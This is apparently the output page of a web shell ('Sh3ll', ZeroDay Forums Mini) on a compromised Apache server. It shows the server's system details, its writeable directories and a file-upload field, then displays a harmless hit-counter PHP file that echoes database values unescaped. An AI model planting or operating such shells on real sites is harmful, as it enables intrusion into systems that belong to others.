Sh3ll
OdayForums


Server : Apache
System : Linux profile 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 8.0.28
Disable Function : NONE
Directory :  /var/www/html/mmishra/indem/iiita/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/mmishra/indem/iiita/hitmeter.php
<?php
checklogin($role);
$r = mysql_query("select * from hitmeter order by counter desc");
echo "Below table reflects performance of this site link-wise in descending order. This will help you in focusing on demanded features/content for improvements of the website in tern business too.";

echo "<table width='98%' class='normal'>
<tr><th>No.</th><th>Pages</th><th>Counter</th><th>Dated</th></tr>";
while($o = mysql_fetch_object($r)) {
	$i++;
	echo "<tr valign='top' bgcolor='";
	if ($i % 2) echo $col1;
	else echo $col2;
	echo "'><td>$i</td><td>$o->url</td><td>$o->counter</td><td>$o->dated</td></tr>";
}
echo "</table>";

?>



ZeroDay Forums Mini